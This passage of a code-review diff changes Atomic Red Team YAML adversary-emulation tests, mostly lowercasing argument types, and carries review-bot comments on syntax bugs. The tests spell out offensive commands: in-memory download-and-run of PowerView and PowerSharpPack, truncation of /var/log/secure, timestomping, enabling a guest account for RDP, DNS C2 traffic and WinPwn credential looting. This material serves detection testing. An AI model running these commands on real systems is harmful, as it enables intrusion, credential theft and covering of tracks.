New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'"
cleanup_command: Remove-Item $env:TEMP\T1059.007.out.txt -ErrorAction Ignore
name: command_prompt
- name: JScript execution to gather local computer information via wscript
auto_generated_guid: 0709945e-4fec-4c49-9faf-c3c292a74484
description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} "
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: "wscript #{jscript}"
name: command_prompt
- name: JScript execution to gather local computer information via cscript
auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035
description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} "
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'"
cleanup_command: Remove-Item $env:TEMP\T1059.007.out.txt -ErrorAction Ignore
name: command_prompt
- name: JScript execution to gather local computer information via wscript
auto_generated_guid: 0709945e-4fec-4c49-9faf-c3c292a74484
description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
supported_platforms:
- windows
input_arguments:
jscript:
description: Path to sample script
type: string
default: PathToAtomicsFolder\T1059.007\src\sys_info.js
dependency_executor_name: powershell
dependencies:
- description: Sample script must exist on disk at specified location (#{jscript})
prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} "
get_prereq_command: |-
New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}"
executor:
command: "wscript #{jscript}"
name: command_prompt
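Review bot: the cscript test's command, `cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'`, carries a stray trailing `'`, and both it and the cleanup (`Remove-Item $env:TEMP\T1059.007.out.txt`) use PowerShell syntax while the executor is `command_prompt`; under cmd.exe `$env:TEMP` is not expanded, so the redirect targets a literal `$env:TEMP\...` path relative to the working directory and `Remove-Item` is not a cmd command. Either set `name: powershell` and remove the quote, or rewrite as `cscript #{jscript} > %TEMP%\T1059.007.out.txt` with `del %TEMP%\T1059.007.out.txt` for cleanup. The wscript test below has the same executor/syntax mismatch in its cleanup-free form only if a cleanup is added later, so this is the one to fix now.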
+9 -9
@@ -25,7 +25,7 @@ atomic_tests:
input_arguments:
user:
description: User to identify what groups a user is a member of
type: String
type: string
default: administrator
executor:
command: |
@@ -76,10 +76,10 @@ atomic_tests:
input_arguments:
computer_name:
description: hostname of the computer to analyze
type: Path
type: path
default: $env:COMPUTERNAME
executor:
command: |
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
name: powershell
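Review bot: `computer_name` ("hostname of the computer to analyze", default `$env:COMPUTERNAME`) is a host name, not a filesystem path, so `path` is the wrong type here and `string` fits. The second command line also ends with an unmatched `"` after `-Verbose`; PowerShell reports that as a missing string terminator for the whole command, so neither the PowerView download nor `Find-GPOComputerAdmin` runs. Remove the quote.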
@@ -88,7 +88,7 @@ atomic_tests:
description: |
When successful, accounts that do not require kerberos pre-auth will be returned
supported_platforms:
- windows
- windows
dependency_executor_name: powershell
dependencies:
- description: |
@@ -110,7 +110,7 @@ atomic_tests:
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
- name: Adfind - Query Active Directory Groups
auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
description: |
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -118,7 +118,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -164,7 +164,7 @@ atomic_tests:
When successful, accounts that do not require kerberos pre-auth will be returned.
Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
supported_platforms:
- windows
- windows
dependency_executor_name: powershell
dependencies:
- description: |
@@ -194,7 +194,7 @@ atomic_tests:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
name: powershell
name: powershell
- name: Get-DomainGroup with PowerView
auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
description: |
@@ -205,4 +205,4 @@ atomic_tests:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
name: powershell
name: powershell
+1 -1
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
log_name:
description: Windows Log Name, ex System
type: String
type: string
default: System
executor:
command: |
+3 -3
@@ -23,7 +23,7 @@ atomic_tests:
input_arguments:
username:
description: Username of mail spool
type: String
type: string
default: root
executor:
command: |
@@ -38,9 +38,9 @@ atomic_tests:
input_arguments:
log_path:
description: Path of specified log
type: Path
type: path
default: /var/log/secure
executor:
command: |
echo 0> #{log_path}
name: bash
name: bash
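Review bot: in the executor `echo 0> #{log_path}`, bash parses `0>` (digit directly before `>`) as a redirection of file descriptor 0 to the file, so the log is truncated but no `0` is written and echo prints an empty line to stdout; if writing a zero is the intent it needs `echo 0 > #{log_path}`, and if only truncation is intended `: > #{log_path}` states that plainly. The `Path` to `path` change in the hunk is correct.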
+10 -9
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
type: path
default: /tmp/victim-files/a
executor:
command: |
@@ -27,7 +27,7 @@ atomic_tests:
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
type: path
default: /tmp/victim-files
executor:
command: |
@@ -42,7 +42,7 @@ atomic_tests:
input_arguments:
file_to_shred:
description: Path of file to shred
type: Path
type: path
default: /tmp/victim-shred.txt
executor:
command: |
@@ -57,8 +57,9 @@ atomic_tests:
- windows
input_arguments:
file_to_delete:
description: File to delete. Run the prereq command to create it if it does not exist.
type: String
description: File to delete. Run the prereq command to create it if it does
not exist.
type: string
default: '%temp%\deleteme_T1551.004'
dependency_executor_name: command_prompt
dependencies:
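Review bot: the `file_to_delete` description is now folded across two lines (`description: File to delete. Run the prereq command to create it if it does` / `not exist.`) while the identical descriptions for the other tests in this file stay on one line; YAML folds the plain scalar back into a single string, so it is not wrong, but it looks like a serializer line-width artifact and makes the file inconsistent. Keep it on one line to match the rest.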
@@ -82,7 +83,7 @@ atomic_tests:
input_arguments:
folder_to_delete:
description: Folder to delete. Run the prereq command to create it if it does not exist.
type: String
type: string
default: '%temp%\deleteme_T1551.004'
dependency_executor_name: command_prompt
dependencies:
@@ -105,7 +106,7 @@ atomic_tests:
input_arguments:
file_to_delete:
description: File to delete. Run the prereq command to create it if it does not exist.
type: String
type: string
default: $env:TEMP\deleteme_T1551.004
dependency_executor_name: powershell
dependencies:
@@ -128,7 +129,7 @@ atomic_tests:
input_arguments:
folder_to_delete:
description: Folder to delete. Run the prereq command to create it if it does not exist.
type: String
type: string
default: $env:TEMP\deleteme_folder_T1551.004
dependency_executor_name: powershell
dependencies:
@@ -177,7 +178,7 @@ atomic_tests:
input_arguments:
teamviewer_log_file:
description: Teamviewer log file to create and delete.
type: String
type: string
default: $env:TEMP\TeamViewer_54.log
executor:
command: |
+8 -8
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
share_name:
description: Share to add.
type: String
type: string
default: '\\test\share'
executor:
command: |
@@ -26,7 +26,7 @@ atomic_tests:
input_arguments:
share_name:
description: Share to remove.
type: String
type: string
default: '\\test\share'
executor:
command: |
@@ -41,7 +41,7 @@ atomic_tests:
input_arguments:
share_name:
description: Share to remove.
type: String
type: string
default: '\\test\share'
executor:
command: |
@@ -60,13 +60,13 @@ atomic_tests:
- windows
executor:
command: |
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f
name: command_prompt
elevation_required: true
elevation_required: true
- name: Remove Administrative Shares
auto_generated_guid: 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62
description: |
+12 -12
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
type: path
default: /opt/filename
executor:
command: |
@@ -27,7 +27,7 @@ atomic_tests:
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
type: path
default: /opt/filename
executor:
command: |
@@ -46,7 +46,7 @@ atomic_tests:
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
type: path
default: /opt/filename
executor:
command: |
@@ -68,11 +68,11 @@ atomic_tests:
input_arguments:
target_file_path:
description: Path of file to modify timestamps of
type: Path
type: path
default: /opt/filename
reference_file_path:
description: Path of reference file to read timestamps from
type: Path
type: path
default: /bin/sh
executor:
command: |
@@ -88,11 +88,11 @@ atomic_tests:
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: String
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change creation timestamp
type: Path
type: path
default: $env:TEMP\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
@@ -117,11 +117,11 @@ atomic_tests:
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: String
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change modified timestamp
type: Path
type: path
default: $env:TEMP\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
@@ -146,11 +146,11 @@ atomic_tests:
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: String
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change last access timestamp
type: Path
type: path
default: $env:TEMP\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
@@ -178,7 +178,7 @@ atomic_tests:
input_arguments:
file_path:
description: File path for timestomp payload
type: String
type: string
default: $env:appdata\Microsoft
dependency_executor_name: powershell
dependencies:
+16 -16
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
domain:
description: Default domain to simulate against
type: String
type: string
default: www.google.com
executor:
command: |
@@ -34,24 +34,24 @@ atomic_tests:
input_arguments:
domain:
description: Default domain to simulate against
type: String
type: string
default: www.google.com
curl_path:
description: path to curl.exe
type: Path
type: path
default: C:\Windows\System32\Curl.exe
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path}
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path}
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
executor:
command: |
#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
@@ -70,7 +70,7 @@ atomic_tests:
input_arguments:
domain:
description: Default domain to simulate against
type: String
type: string
default: www.google.com
executor:
command: |
+15 -15
@@ -12,19 +12,19 @@ atomic_tests:
input_arguments:
query_type:
description: DNS query type
type: String
type: string
default: TXT
subdomain:
description: Subdomain prepended to the domain name
type: String
type: string
default: atomicredteam
query_volume:
description: Number of DNS queries to send
type: Integer
type: integer
default: 1000
domain:
description: Default domain to simulate against
type: String
type: string
default: 127.0.0.1.xip.io
executor:
command: |
@@ -41,27 +41,27 @@ atomic_tests:
input_arguments:
runtime:
description: Time in minutes to run the simulation
type: Integer
type: integer
default: 30
domain:
description: Default domain to simulate against
type: String
type: string
default: 127.0.0.1.xip.io
subdomain:
description: Subdomain prepended to the domain name
type: String
type: string
default: atomicredteam
query_type:
description: DNS query type
type: String
type: string
default: TXT
c2_interval:
description: Seconds between C2 requests to the command and control server
type: Integer
type: integer
default: 30
c2_jitter:
description: Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests
type: Integer
type: integer
default: 20
executor:
command: |
@@ -79,15 +79,15 @@ atomic_tests:
input_arguments:
query_type:
description: DNS query type
type: String
type: string
default: TXT
subdomain:
description: Subdomain prepended to the domain name (should be 63 characters to test maximum length)
type: String
type: string
default: atomicredteamatomicredteamatomicredteamatomicredteamatomicredte
domain:
description: Default domain to simulate against
type: String
type: string
default: 127.0.0.1.xip.io
executor:
command: |
@@ -108,11 +108,11 @@ atomic_tests:
input_arguments:
domain:
description: Domain Name configured to use DNS Server where your C2 listener is running
type: String
type: string
default: example.com
server_ip:
description: IP address of DNS server where your C2 listener is running
type: String
type: string
default: 127.0.0.1
executor:
command: |
+30 -32
@@ -1,68 +1,66 @@
attack_technique: T1072
display_name: Software Deployment Tools
atomic_tests:
- name: Radmin Viewer Utility
- name: Radmin Viewer Utility
auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
description: |
An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
supported_platforms:
- windows
- windows
input_arguments:
radmin_installer:
description: Radmin Viewer installer
type: Path
type: path
default: 'RadminViewer.msi'
radmin_exe:
description: The radmin.exe executable from RadminViewer.msi
type: Path
type: path
default: 'Radmin Viewer 3/Radmin.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
prereq_command: |
if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Downloading radmin installer
(New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}")
Write-Host Install Radmin
Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn
- description: |
Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
prereq_command: |
if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Downloading radmin installer
(New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}")
Write-Host Install Radmin
Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn
executor:
name: command_prompt
elevation_required: true
command: |
elevation_required: true
command: |
"%PROGRAMFILES(x86)%/#{radmin_exe}"
- name: PDQ Deploy RAT
auto_generated_guid: e447b83b-a698-4feb-bed1-a7aaf45c3443
description: |
An adversary may use PDQ Deploy Software to deploy the Remote Adminstartion Tool, this will start the PDQ console.
supported_platforms:
- windows
- windows
input_arguments:
PDQ_Deploy_installer:
description: PDQ Deploy Install
type: Path
type: path
default: 'PDQDeploysetup.exe'
PDQ_Deploy_exe:
description: The PDQDeployConsole.exe executable from PDQDeploysetup.exe
type: Path
type: path
default: 'Admin Arsenal/PDQ Deploy/PDQDeployConsole.exe'
dependency_executor_name: powershell
dependencies:
- description: |
PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe})
prereq_command: |
if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Downloading PDQ Deploy installer
(New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}")
Write-Host Install PDQ Deploy
Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s"
- description: |
PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe})
prereq_command: |
if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host Downloading PDQ Deploy installer
(New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}")
Write-Host Install PDQ Deploy
Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s"
executor:
name: command_prompt
elevation_required: true
command: |
elevation_required: true
command: |
"%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
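Review bot: `Remote Adminstartion Tool` in the PDQ Deploy description is misspelled (`Remote Administration Tool`); since this hunk rewrites the whole file it is the right moment to fix it. Separately, both `get_prereq_command` blocks download an installer (`Radmin_Viewer_3.5.2.1_EN.msi`, `Deploy_19.3.350.0.exe`) and immediately execute it with `msiexec` / `-ArgumentList "/s"` on an elevated test without any hash check; consider recording a known-good hash and verifying the download before running it.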
+4 -5
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
type: Path
type: path
default: $env:TEMP\discovery.bat
executor:
command: |
@@ -29,7 +29,7 @@ atomic_tests:
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
type: Path
type: path
default: /tmp/T1074.001_discovery.log
executor:
command: |
@@ -45,11 +45,11 @@ atomic_tests:
input_arguments:
output_file:
description: Location to save zipped file or folder
type: Path
type: path
default: $env:TEMP\Folder_to_zip.zip
input_file:
description: Location of file or folder to zip
type: Path
type: path
default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip
executor:
command: |
@@ -57,4 +57,3 @@ atomic_tests:
cleanup_command: |
Remove-Item -Path #{output_file} -ErrorAction Ignore
name: powershell
+8 -8
@@ -11,23 +11,23 @@ atomic_tests:
input_arguments:
guest_user:
description: Specify the guest account
type: String
type: string
default: guest
guest_password:
description: Specify the guest password
type: String
type: string
default: Password123!
local_admin_group:
description: Specify the admin localgroup name
type: String
type: string
default: Administrators
remote_desktop_users_group_name:
description: Specify the remote desktop users group name
type: String
type: string
default: Remote Desktop Users
remove_rdp_access_during_cleanup:
description: Set to 1 if you want the cleanup to remove RDP access to machine
type: Integer
type: integer
default: 0
executor:
command: |-
@@ -56,13 +56,13 @@ atomic_tests:
input_arguments:
guest_user:
description: Specify the guest account
type: String
type: string
default: guest
executor:
command: |
net user #{guest_user} /active:yes
net user #{guest_user} /active:yes
cleanup_command: |
net user #{guest_user} /active:no
net user #{guest_user} /active:no
name: command_prompt
elevation_required: true
+3 -3
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
password:
description: Password for art-test user
type: String
type: string
default: -4RTisCool!-321
executor:
command: |-
@@ -22,7 +22,7 @@ atomic_tests:
net user art-test /delete >nul 2>&1
name: command_prompt
elevation_required: true
- name: Create local account with admin privileges - MacOS
auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
description: After execution the new account will be active and added to the Administrators group
@@ -42,7 +42,7 @@ atomic_tests:
sudo dscl . -delete /Users/AtomicUser
name: bash
elevation_required: true
- name: WinPwn - Loot local Credentials - powerhell kittie
- name: WinPwn - Loot local Credentials - powerhell kittie
auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
description: Loot local Credentials - powerhell kittie technique via function of WinPwn
supported_platforms:
+12 -15
@@ -1,4 +1,3 @@
---
attack_technique: T1078.004
display_name: 'Valid Accounts: Cloud Accounts'
@@ -9,28 +8,28 @@ atomic_tests:
GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud.
supported_platforms:
- google-workspace
- iaas:gcp
- google-workspace
- iaas:gcp
input_arguments:
project-id:
description: ID of the project, you want to create service account as well as service account key for
type: String
type: string
default: art-project-1
service-account-name:
description: Name of the service account
type: String
type: string
default: gcp-art-service-account-1
service-account-email:
description: Email of the service account
type: String
type: string
default: gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com
output-key-file:
description: Email of the service account
type: String
type: string
default: gcp-art-service-account-1.json
executor:
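Review bot: the `output-key-file` description reads `Email of the service account`, a copy of the `service-account-email` description above it; its default `gcp-art-service-account-1.json` shows it is the file the service account key is written to, so the description should say that, and `type: path` fits it better than `string` now that the schema's `path` type is used throughout this change. The `project-id` description (`ID of the project, you want to create service account as well as service account key for`) would also read better as `ID of the project in which to create the service account and its key`.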
@@ -46,11 +45,9 @@ atomic_tests:
dependency_executor_name: sh
dependencies:
- description: |
Requires gcloud
prereq_command: |
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
- description: |
Requires gcloud
prereq_command: |
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+20 -21
@@ -33,7 +33,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file used to store the results.
type: Path
type: path
default: /tmp/T1082.txt
executor:
command: |
@@ -119,17 +119,17 @@ atomic_tests:
input_arguments:
vbscript:
description: Path to sample script
type: String
type: string
default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
dependency_executor_name: powershell
dependencies:
- description: |
Sample script file must exist on disk at specified location (#{vbscript})
prereq_command: |
if (Test-Path #{vbscript}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"
- description: |
Sample script file must exist on disk at specified location (#{vbscript})
prereq_command: |
if (Test-Path #{vbscript}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"
executor:
command: 'cscript #{vbscript}'
name: powershell
@@ -167,7 +167,7 @@ atomic_tests:
name: sh
- name: WinPwn - winPEAS
auto_generated_guid: eea1d918-825e-47dd-acc2-814d6c58c0e1
description: Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
description: Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
supported_platforms:
- windows
executor:
@@ -178,7 +178,7 @@ atomic_tests:
name: powershell
- name: WinPwn - itm4nprivesc
auto_generated_guid: 3d256a2f-5e57-4003-8eb6-64d91b1da7ce
description: Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
description: Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
supported_platforms:
- windows
executor:
@@ -189,7 +189,7 @@ atomic_tests:
name: powershell
- name: WinPwn - Powersploits privesc checks
auto_generated_guid: 345cb8e4-d2de-4011-a580-619cf5a9e2d7
description: Powersploits privesc checks using oldchecks function of WinPwn
description: Powersploits privesc checks using oldchecks function of WinPwn
supported_platforms:
- windows
executor:
@@ -206,7 +206,7 @@ atomic_tests:
name: powershell
- name: WinPwn - General privesc checks
auto_generated_guid: 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed
description: General privesc checks using the otherchecks function of WinPwn
description: General privesc checks using the otherchecks function of WinPwn
supported_platforms:
- windows
executor:
@@ -249,7 +249,7 @@ atomic_tests:
RBCD-Check -consoleoutput -noninteractive
name: powershell
- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches
- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches
auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107
description: PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn
supported_platforms:
@@ -269,12 +269,12 @@ atomic_tests:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"
name: powershell
- name: WinPwn - PowerSharpPack - Seatbelt
- name: WinPwn - PowerSharpPack - Seatbelt
auto_generated_guid: 5c16ceb4-ba3a-43d7-b848-a13c1f216d95
description: |-
PowerSharpPack - Seatbelt technique via function of WinPwn.
[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
supported_platforms:
- windows
@@ -294,11 +294,11 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
default: null
type: string
default:
password:
description: Azure AD password
type: String
type: string
default: T1082Az
dependency_executor_name: powershell
dependencies:
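Review bot: the `username` default changes from `default: null` to a bare `default:`; both load as YAML null, so behaviour is unchanged, but the explicit `null` was self-documenting and the bare key reads like an accidental deletion. Keep `default: null` (or `''` if the schema requires a string value for `type: string`), and confirm the new JSON schema actually permits a null default on a `string` argument, since matching that schema is the purpose of this change.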
@@ -369,4 +369,3 @@ atomic_tests:
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
name: command_prompt
+9 -9
@@ -9,9 +9,9 @@ atomic_tests:
- windows
input_arguments:
output_file:
description: File to output results to
type: String
default: '%temp%\T1083Test1.txt'
description: File to output results to
type: string
default: '%temp%\T1083Test1.txt'
executor:
command: |
dir /s c:\ >> #{output_file}
@@ -52,7 +52,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file used to store the results.
type: Path
type: path
default: /tmp/T1083.txt
executor:
command: |
@@ -77,7 +77,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file used to store the results.
type: Path
type: path
default: /tmp/T1083.txt
executor:
command: |
@@ -99,7 +99,7 @@ atomic_tests:
input_arguments:
File_to_output:
description: File to output results to
type: String
type: string
default: $env:temp\T1083Test5.txt
executor:
command: |
@@ -116,19 +116,19 @@ atomic_tests:
cat #{File_to_output}
cleanup_command: |
remove-item #{File_to_output} -ErrorAction SilentlyContinue
name: powershell
name: powershell
- name: Launch DirLister Executable
auto_generated_guid: c5bec457-43c9-4a18-9a24-fe151d8971b7
description: |-
Launches the DirLister executable for a short period of time and then exits.
Recently seen used by [BlackCat ransomware](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/) to create a list of accessible directories and files.
supported_platforms:
- windows
input_arguments:
dirlister_path:
description: 'Path to the DirLister executable '
type: String
type: string
default: PathToAtomicsFolder\T1083\bin\DirLister.exe
dependency_executor_name: powershell
dependencies:
+4 -4
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1087.001.txt
executor:
command: |
@@ -29,7 +29,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1087.001.txt
executor:
command: |
@@ -49,7 +49,7 @@ atomic_tests:
input_arguments:
output_file:
